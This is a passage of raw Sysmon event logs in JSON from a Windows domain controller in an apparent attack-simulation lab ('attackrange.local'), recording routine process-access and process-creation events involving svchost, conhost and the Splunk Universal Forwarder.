05:50:52.946","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4103,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:52.946\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:52.946","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4104,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:52.946\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:52.946","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4105,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:52.946\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:52.946","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4106,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:52.946\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:52.946","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4107,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:52.946\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-02BC-5F25-0000-0010680F0600}\r\nTargetProcessId: 4692\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:52.946","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-02BC-5F25-0000-0010680F0600}","TargetProcessId":"4692","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4108,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:53.086\r\nSourceProcessGUID: {A837DB8D-02BC-5F25-0000-0010680F0600}\r\nSourceProcessId: 4692\r\nSourceThreadId: 4684\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:53.086","SourceProcessGUID":"{A837DB8D-02BC-5F25-0000-0010680F0600}","SourceProcessId":"4692","SourceThreadId":"4684","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4109,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:53.618\r\nProcessGuid: {A837DB8D-02BD-5F25-0000-001004110600}\r\nProcessId: 4676\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:50:53.618","ProcessGuid":"{A837DB8D-02BD-5F25-0000-001004110600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4110,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:53.617\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-02BD-5F25-0000-001004110600}\r\nTargetProcessId: 4676\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:53.617","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-02BD-5F25-0000-001004110600}","TargetProcessId":"4676","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
